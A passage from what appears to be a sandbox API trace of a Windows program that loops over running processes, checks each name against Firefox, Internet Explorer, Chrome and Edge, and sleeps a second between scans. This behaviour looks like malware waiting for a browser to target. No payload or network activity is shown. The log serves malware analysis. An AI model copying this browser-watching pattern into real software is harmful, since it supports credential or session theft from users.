szExeFile="birth bean.exe")) returned 1 [0230.465] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0230.465] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0230.465] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0230.465] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.465] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0230.465] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0230.465] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0230.465] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0230.465] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.465] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0230.466] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0230.466] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0230.466] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0230.466] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.466] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0230.466] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0230.466] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0230.466] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0230.466] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.466] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0230.467] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0230.467] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0230.467] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0230.467] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.467] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0230.468] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0230.468] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0230.468] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0230.468] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.468] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0230.468] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0230.468] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0230.468] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0230.468] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.468] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0230.469] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0230.469] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0230.469] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0230.469] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.469] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0230.469] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0230.469] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0230.469] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0230.469] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.469] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0230.470] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0230.470] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0230.470] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0230.470] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.470] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0230.470] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0230.470] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0230.471] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0230.471] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.471] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0230.471] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0230.471] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0230.471] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0230.471] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.471] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0230.472] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0230.472] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0230.472] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0230.472] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.472] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.472] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0230.472] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0230.472] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0230.472] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.472] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0230.473] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0230.473] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0230.473] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0230.473] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.473] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.473] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0230.473] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0230.473] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0230.473] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.473] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0230.474] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0230.474] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0230.474] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0230.474] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.474] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.474] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0230.475] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0230.475] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0230.475] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.475] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0230.475] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0230.475] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0230.475] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0230.475] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.475] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0230.476] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0230.476] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0230.476] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0230.476] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.476] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.476] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0230.476] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0230.476] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0230.476] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.476] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.477] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0230.477] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0230.477] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0230.477] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.477] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.477] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0230.477] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0230.477] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0230.478] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.478] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.478] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0230.478] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0230.478] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0230.478] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.478] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0230.479] CloseHandle (hObject=0xd4) returned 1 [0230.479] Sleep (dwMilliseconds=0x3e8) [0231.482] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0231.483] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.484] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0231.484] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0231.484] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0231.484] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0231.484] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0231.484] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0231.484] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0231.484] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0231.484] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0231.484] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0231.485] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0231.485] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0231.485] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0231.485] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.485] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0231.485] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0231.485] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0231.485] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0231.486] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.486] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0231.486] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0231.486] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0231.486] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0231.486] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.486] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0231.487] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0231.487] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0231.487] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0231.487] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.487] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0231.487] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0231.487] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0231.487] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0231.487] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.487] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0231.488] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0231.488] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0231.488] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0231.488] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.488] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0231.488] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0231.488] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0231.488] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0231.488] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.488] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0231.489] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0231.489] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0231.489] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0231.489] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.489] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.489] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0231.489] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0231.490] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0231.490] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.490] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.490] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0231.490] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0231.490] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0231.490] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.490] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.491] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0231.491] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0231.491] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0231.491] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.491] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.491] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0231.491] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0231.491] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0231.491] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.491] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.492] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0231.492] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0231.492] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0231.492] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.492] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0231.492] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0231.492] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0231.492] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0231.492] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.492] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.493] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0231.493] 